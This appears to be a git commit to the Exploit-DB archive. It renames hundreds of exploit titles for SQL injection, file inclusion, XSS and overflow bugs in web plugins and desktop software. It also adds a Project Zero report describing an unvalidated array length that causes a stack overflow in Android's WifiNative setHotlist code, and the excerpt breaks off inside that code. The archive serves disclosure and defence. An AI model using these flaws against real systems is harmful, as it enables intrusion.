DB: 2016-12-21

2 new exploits

FlashGet 1.9 - (FTP PWD Response) Remote Buffer Overflow (PoC)
FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)

VMware Workstation - 'hcmon.sys 6.0.0.45731' Local Denial of Service
VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service

Flashget 3.x - IEHelper Remote Exec (PoC)
FlashGet 3.x - IEHelper Remote Exec (PoC)

Rosoft media player 4.4.4 - Buffer Overflow (SEH) (PoC)
Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC)
Google Android -  WifiNative::setHotlist Stack Overflow
Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)
FlashGet 1.9.0.1012 - (FTP PWD Response) SEH STACK Overflow
FlashGet 1.9.0.1012 - (FTP PWD Response) Buffer Overflow (SafeSEH)
FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH STACK Overflow
FlashGet 1.9.0.1012 - 'FTP PWD Response' Buffer Overflow (SafeSEH)

freeFTPd - Remote Authentication Bypass
freeFTPd 1.2.6 - Remote Authentication Bypass

freeFTPd 1.0.10 - 'PASS' SEH Overflow (Metasploit)
freeFTPd 1.0.10 - 'PASS' SEH Buffer Overflow (Metasploit)

freeFTPd - 'PASS' Buffer Overflow (Metasploit)
freeFTPd 1.0.10 - 'PASS' Buffer Overflow (Metasploit)
AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion
iziContents RC6 - GLOBALS[] Remote Code Execution
AlberT-EasySite 1.0a5 - 'PSA_PATH' Parameter Remote File Inclusion
iziContents RC6 - Remote Code Execution

SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion
SunShop Shopping Cart 3.5 - 'abs_path' Parameter Remote File Inclusion

SunShop 4.0 RC 6 - 'Search' Blind SQL Injection
SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection

izicontents rc6 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities
iziContents rc6 - Remote File Inclusion / Local File Inclusion
gelato CMS 0.95 - (img) Remote File Disclosure
dotCMS 1.6 - 'id' Multiple Local File Inclusion
ZeeJobsite 2.0 - (adid) SQL Injection
gelato CMS 0.95 - 'img' Parameter Remote File Disclosure
dotCMS 1.6 - 'id' Parameter Local File Inclusion
Zeeways ZeeJobsite 2.0 - 'adid' Parameter SQL Injection

XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion
XNova 0.8 sp1 - 'xnova_root_path' Parameter Remote File Inclusion

PHPBasket - 'product.php pro_id' SQL Injection
PHPBasket - 'pro_id' Parameter SQL Injection
Ad Board - 'id' SQL Injection
SunShop 4.1.4 - 'id' SQL Injection
Banner Management Script - 'tr.php id' SQL Injection
Ad Board - 'id' Parameter SQL Injection
SunShop Shopping Cart 4.1.4 - 'id' Parameter SQL Injection
Banner Management Script - 'id' Parameter SQL Injection
phpBazar 2.0.2 - (adid) SQL Injection
webEdition CMS - (we_objectID) Blind SQL Injection
CustomCMS 4.0 - (CCMS) print.php SQL Injection
phpBazar 2.0.2 - 'adid' Parameter SQL Injection
webEdition CMS - 'we_objectID' Parameter Blind SQL Injection
CustomCMS 4.0 - 'print.php' SQL Injection

TinyCMS 1.1.2 - (templater.php) Local File Inclusion
TinyCMS 1.1.2 - 'templater.php' Local File Inclusion
onenews Beta 2 - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities
5 star review - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
onenews Beta 2 - Cross-Site Scripting / HTML Injection / SQL Injection
5 star review - Cross-Site Scripting / SQL Injection

Web Directory Script 2.0 - (name) SQL Injection
Web Directory Script 2.0 - 'name' Parameter SQL Injection

Crafty Syntax Live Help 2.14.6 - (department) SQL Injection
Crafty Syntax Live Help 2.14.6 - 'department' Parameter SQL Injection
k-rate - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
CMME 1.12 - (Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory) Multiple Vulnerabilities
Thickbox Gallery 2.0 - (Admins.php) Admin Data Disclosure
k-rate - SQL Injection / Cross-Site Scripting
CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory
Thickbox Gallery 2.0 - 'Admins.php' Admin Data Disclosure

phpMyRealty 1.0.9 - Multiple SQL Injections
PHPMyRealty 1.0.9 - Multiple SQL Injections
brim 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Web Directory Script 1.5.3 - (site) SQL Injection
Words tag script 1.2 - (word) SQL Injection
Brim 2.0.0 - SQL Injection / Cross-Site Scripting
Web Directory Script 1.5.3 - 'site' Parameter SQL Injection
Words tag script 1.2 - 'word' Parameter SQL Injection

WeBid 0.5.4 - (item.php id) SQL Injection
WeBid 0.5.4 - 'item.php' SQL Injection

ZeeJobsite 2.0 - Arbitrary File Upload
Zeeways ZeeJobsite 2.0 - Arbitrary File Upload

BandSite CMS 1.1.4 - (members.php memid) SQL Injection
BandSite CMS 1.1.4 - 'members.php' SQL Injection

Thickbox Gallery 2 - 'index.php ln' Local File Inclusion
Thickbox Gallery 2 - 'index.php' Local File Inclusion

Joomla! Component 'com_wmtpic' 1.0 - SQL Injection
Joomla! Component com_wmtpic 1.0 - SQL Injection
Joomla! Component 'com_redshop' 1.0 - Local File Inclusion
Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion
Joomla! Component redSHOP 1.0 - Local File Inclusion
Joomla! Component redTWITTER 1.0 - Local File Inclusion
Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion
Joomla! Component 'com_shoutbox' - Local File Inclusion
Joomla! Component SVMap 1.1.1 - Local File Inclusion
Joomla! Component Shoutbox Pro - Local File Inclusion

Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion
Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion

Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection
Joomla! Component XOBBIX 1.0 - 'prodid' Parameter SQL Injection

Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion
Joomla! Component VJDEO 1.0 - Local File Inclusion

Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion

Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion
Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion

Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection
Joomla! Component Real Estate Property 3.1.22-03 - 'aid' Parameter SQL Injection

Joomla! Component 'com_tweetla' - Local File Inclusion
Joomla! Component TweetLA 1.0.1 - Local File Inclusion
Joomla! Component 'com_preventive' - Local File Inclusion
Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection
Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
Joomla! Component RokModule 1.1 - 'moduleid' Parameter Blind SQL Injection

Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion
Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion

Joomla! Component 'com_webtv' - Local File Inclusion
Joomla! Component Web TV 1.0 - Local File Inclusion

Joomla! Component 'com_onlineexam' - Local File Inclusion
Joomla! Component Online Exam 1.5.0 - Local File Inclusion

Joomla! Component 'com_sweetykeeper' - Local File Inclusion
Joomla! Component Sweetykeeper 1.5 - Local File Inclusion

Joomla! Component 'com_sermonspeaker' - SQL Injection
Joomla! Component SermonSpeaker - SQL Injection

Joomla! Component 'com_QPersonel' - SQL Injection
Joomla! Component QPersonel 1.0.2 - SQL Injection

Joomla! Component 'com_photobattle' - Local File Inclusion
Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
Joomla! Component 'com_zimbcomment' - Local File Inclusion
Joomla! Component 'com_zimbcore' - Local File Inclusion
Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
Joomla! Component ZiMBCore 0.1 - Local File Inclusion
Joomla! Component 'com_wmi' - Local File Inclusion
Joomla! Component 'com_orgchart' - Local File Inclusion
Joomla! Component WMI 1.5.0 - Local File Inclusion
Joomla! Component OrgChart 1.0.0 - Local File Inclusion

Joomla! Component 'com_ultimateportfolio' - Local File Inclusion
Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion

Joomla! Component 'com_smartsite' - Local File Inclusion
Joomla! Component SmartSite 1.0.0 - Local File Inclusion

Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion
Joomla! Component simpledownload 0.9.5 - Local File Inclusion

Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure
Joomla! Component simpledownload 0.9.5 - Local File Disclosure

Wordpress Plugin TinyBrowser - Arbitrary File Upload
WordPress Plugin TinyBrowser - Arbitrary File Upload

Joomla! Component 'com_qpersonel' 1.0 - SQL Injection
Joomla! Component Q-Personel 1.0 - SQL Injection

Joomla! Component 'com_searchlog' - SQL Injection
Joomla! Component Search Log 3.1.0 - SQL Injection

Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities
Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities

Joomla! Component 'com_picasa2gallery' - Local File Inclusion
Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion

Joomla! Component 'jeeventcalendar' - SQL Injection
Joomla! Component JE Ajax Event Calendar 1.0.5 - SQL Injection

Joomla! Component 'com_realtyna' - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
Joomla! Component 'jesubmit' - SQL Injection
Joomla! Component 'com_sef' - Remote File Inclusion
Joomla! Component jesubmit 1.4 - SQL Injection
Joomla! Component com_sef - Remote File Inclusion

Joomla! Component 'jesectionfinder' - Local File Inclusion
Joomla! Component jesectionfinder - Local File Inclusion

Joomla! Component 'Joomanager' - SQL Injection
Joomla! Component Joomanager - SQL Injection

Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting
Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting
Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection
Joomla! Component 'com_quickfaq' - Blind SQL Injection
Joomla! Component redSHOP 1.0 - 'pid' Parameter SQL Injection
Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection

Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection
Joomla! Component redSHOP 1.0.23.1 - Blind SQL Injection

Joomla! Component 'com_staticxt' - SQL Injection
Joomla! Component StaticXT - SQL Injection

Joomla! Component 'com_oziogallery' - SQL Injection
Joomla! Component Ozio Gallery - SQL Injection

Joomla! Component 'com_youtube' - SQL Injection
Joomla! Component YouTube 1.5 - SQL Injection

Joomla! Component 'com_ttvideo' 1.0 - SQL Injection
Joomla! Component TTVideo 1.0 - SQL Injection

Joomla! Component 'com_teams' - Multiple Blind SQL Injection
Joomla! Component Teams - Multiple Blind SQL Injection

Joomla! Component 'com_picsell' - Local File Disclosure
Joomla! Component PicSell 1.0 - Local File Disclosure

Joomla! Component 'com_restaurantguide' - Multiple Vulnerabilities
Joomla! Component Restaurant Guide 1.0.0 - Multiple Vulnerabilities

Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection
Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection

Joomla! Component 'com_sponsorwall' - SQL Injection
Joomla! Component Sponsor Wall 1.1 - SQL Injection

Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion
Joomla! Component ProDesk 1.5 - Local File Inclusion

Joomla! Component 'mdigg' - SQL Injection
Joomla! Component mDigg 2.2.8 - SQL Injection

phpMyRealty 1.0.7 - SQL Injection
PHPMyRealty 1.0.7 - SQL Injection

Joomla! Component 'com_timereturns' 2.0 - SQL Injection
Joomla! Component Time Returns 2.0 - SQL Injection

Joomla! Component 'com_techfolio' 1.0 - SQL Injection
Joomla! Component Techfolio 1.0 - SQL Injection

Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities
Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities

BRIM < 2.0.0 - SQL Injection
Brim < 2.0.0 - SQL Injection

Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection
Joomla! Component RokModule 1.1 - 'module' Parameter Blind SQL Injection

Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

webid 1.0.5 - Directory Traversal
weBid 1.0.5 - Directory Traversal

Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload
WordPress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload

Webid 1.0.6 - Multiple Vulnerabilities
WeBid 1.0.6 - Multiple Vulnerabilities
MyBulletinBoard RC4 - 'Username' Parameter SQL Injection
MyBulletinBoard RC4 - 'member.php' Multiple Parameter SQL Injection
MyBulletinBoard RC4 - 'polloptions' Parameter SQL Injection
MyBulletinBoard RC4 - 'action' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'Username' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'polloptions' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'action' Parameter SQL Injection

MyBulletinBoard 1.0 - Multiple SQL Injections
MyBulletinBoard (MyBB) 1.0 - Multiple SQL Injections

MyBulletinBoard 1.0 - 'RateThread.php' SQL Injection
MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection

MyBulletinBoard 1.0 - 'usercp.php' SQL Injection
MyBulletinBoard (MyBB) 1.0 - 'usercp.php' SQL Injection

Joomla! Component 'com_redshop' 1.2 - SQL Injection
Joomla! Component redSHOP 1.2 - SQL Injection

MyBulletinBoard 1.0.x/1.1.x - 'usercp.php' SQL Injection
MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection

MyBulletinBoard 1.x - 'usercp.php' Directory Traversal
MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal
Grayscale BandSite CMS 1.1 - help_news.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - help_merch.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - help_mp3.php max_file_size_purdy Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - sendemail.php message_text Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - header.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - login_header.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - bio_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - gbook_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - interview_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - links_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - lyrics_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - member_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - merch_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - mp3_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - news_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - pastshows_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - photo_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - releases_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - reviews_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - shows_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - signgbook_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - footer.php this_year Parameter Cross-Site Scripting
BandSite CMS 1.1 - 'help_news.php' Cross-Site Scripting
BandSite CMS 1.1 - 'help_merch.php' Cross-Site Scripting
BandSite CMS 1.1 - 'help_mp3.php' Cross-Site Scripting
BandSite CMS 1.1 - 'sendemail.php' Cross-Site Scripting
BandSite CMS 1.1 - 'header.php' Cross-Site Scripting
BandSite CMS 1.1 - 'login_header.php' Cross-Site Scripting
BandSite CMS 1.1 - 'bio_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'gbook_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'interview_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'links_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'lyrics_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'member_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'merch_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'mp3_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'news_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'pastshows_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'photo_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'releases_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'reviews_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'shows_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'signgbook_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'footer.php' Cross-Site Scripting

Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting
WordPress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting

Active PHP BookMarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion
Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusion

Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting
WordPress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting

TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Inclusion
SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusion

Active PHP BookMarks 1.0 - APB.php Remote File Inclusion
Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion
TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection
TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting
SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection
SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting

Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery
WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery

DMCMS 0.7 - 'index.php' SQL Injection
deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection
EasySite 2.0 - browser.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - image_editor.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - 'browser.php' Remote File Inclusion
EasySite 2.0 - 'image_editor.php' Remote File Inclusion
EasySite 2.0 - 'skin_chooser.php' Remote File Inclusion

MatterDaddy Market 1.1 - 'admin/login.php' Cross-Site Scripting
MatterDaddy Market 1.1 - 'login.php' Cross-Site Scripting

Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
WordPress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Image Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Fields Attach 1.0 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access

Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access
Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Parameter Arbitrary File Access

Joomla! Component 'com_youtubegallery' - SQL Injection
Joomla! Component Youtube Gallery 4.1.7 - SQL Injection

Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection
Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection

Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection
Joomla! Component Weblinks - 'Itemid' Parameter SQL Injection

Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload
WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting
WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting

Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal
WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal

Wordpress Plugin DukaPress 2.5.2 - Directory Traversal
WordPress Plugin DukaPress 2.5.2 - Directory Traversal

Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection
WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection

Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting
WordPress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting

Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation
WordPress Plugin Duplicator 0.5.8 - Privilege Escalation

Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection
WordPress Plugin Single Personal Message 1.0.3 - SQL Injection

Joomla! Component 'com_sanpham' - Multiple SQL Injections
Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections

Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload
WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload

Joomla! Component 'mod_currencyconverter' - 'from' Parameter Cross-Site Scripting
Joomla! Component Currency Converter 1.0.0 - 'from' Parameter Cross-Site Scripting

Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting
WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting

Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read
WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read

Joomla! Component 'mod_ccnewsletter' 1.0.7 - 'id' Parameter SQL Injection
Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection

Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection
WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection

Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting
WordPress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting

Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
Joomla! Component 'com_rpl' 8.9.2 - Multiple SQL Injections
Joomla! Component 'com_rpl' 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections
Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery

Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting
WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting

Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_sexypolling' - 'answer_id' Parameter SQL Injection
Joomla! Component Sexy polling 1.0.8 - 'answer_id' Parameter SQL Injection

Joomla! Component 'com_novasfh' - 'upload.php' Arbitrary File Upload
Joomla! Component Projoom NovaSFH 3.0.2 - 'upload.php' Arbitrary File Upload

Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection
WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection

Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting
WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting

Wordpress Plugin Job Script by Scubez - Remote Code Execution
WordPress Plugin Job Script by Scubez - Remote Code Execution

Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite
WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite
Wordpress Plugin Answer My Question 1.3 - SQL Injection
Wordpress Plugin Sirv 1.3.1 - SQL Injection
Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection
Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection
WordPress Plugin Answer My Question 1.3 - SQL Injection
WordPress Plugin Sirv 1.3.1 - SQL Injection
WordPress Plugin BBS e-Franchise 1.1.1 - SQL Injection
WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection

Wordpress Plugin Olimometer 2.56 - SQL Injection
WordPress Plugin Olimometer 2.56 - SQL Injection

Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion
WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion
Wordpress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
Wordpress Plugin WP Private Messages 1.0.1 - SQL Injection
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
Offensive Security 2016-12-21 05:01:18 +00:00
parent 1d549a3241
commit be57520c6f
6 changed files with 536 additions and 208 deletions

410
files.csv


138
platforms/android/dos/40945.txt Executable file

@ -0,0 +1,138 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=958
The following code in frameworks/opt/net/wifi/service/jni/com_android_server_wifi_WifiNative.cpp doesn't validate the parameter params.num_bssid, and then copies that number of elements into a stack-allocated wifi_bssid_hotlist_params structure. I don't think this can be reached from an untrusted_app context; but it can be reached from a context with system_api_service access; so a compromised platform app or one of several lower privileged system services (bluetooth, nfc etc.).
static jboolean android_net_wifi_setHotlist(
JNIEnv *env, jclass cls, jint iface, jint id, jobject ap) {
JNIHelper helper(env);
wifi_interface_handle handle = getIfaceHandle(helper, cls, iface);
ALOGD("setting hotlist on interface[%d] = %p", iface, handle);
wifi_bssid_hotlist_params params;
memset(&params, 0, sizeof(params));
params.lost_ap_sample_size = helper.getIntField(ap, "apLostThreshold");
JNIObject<jobjectArray> array = helper.getArrayField(
ap, "bssidInfos", "[Landroid/net/wifi/WifiScanner$BssidInfo;");
params.num_bssid = helper.getArrayLength(array);
if (params.num_bssid == 0) {
ALOGE("setHotlist array length was 0");
return false;
}
for (int i = 0; i < params.num_bssid; i++) { // <--- no validation on num_bssid
JNIObject<jobject> objAp = helper.getObjectArrayElement(array, i);
JNIObject<jstring> macAddrString = helper.getStringField(objAp, "bssid");
if (macAddrString == NULL) {
ALOGE("Error getting bssid field");
return false;
}
ScopedUtfChars chars(env, macAddrString);
const char *bssid = chars.c_str();
if (bssid == NULL) {
ALOGE("Error getting bssid");
return false;
}
parseMacAddress(bssid, params.ap[i].bssid); // <--- params.ap has 128 elements.
mac_addr addr;
memcpy(addr, params.ap[i].bssid, sizeof(mac_addr));
char bssidOut[32];
snprintf(bssidOut, sizeof(bssidOut), "%0x:%0x:%0x:%0x:%0x:%0x", addr[0],
addr[1], addr[2], addr[3], addr[4], addr[5]);
ALOGD("Added bssid %s", bssidOut);
params.ap[i].low = helper.getIntField(objAp, "low");
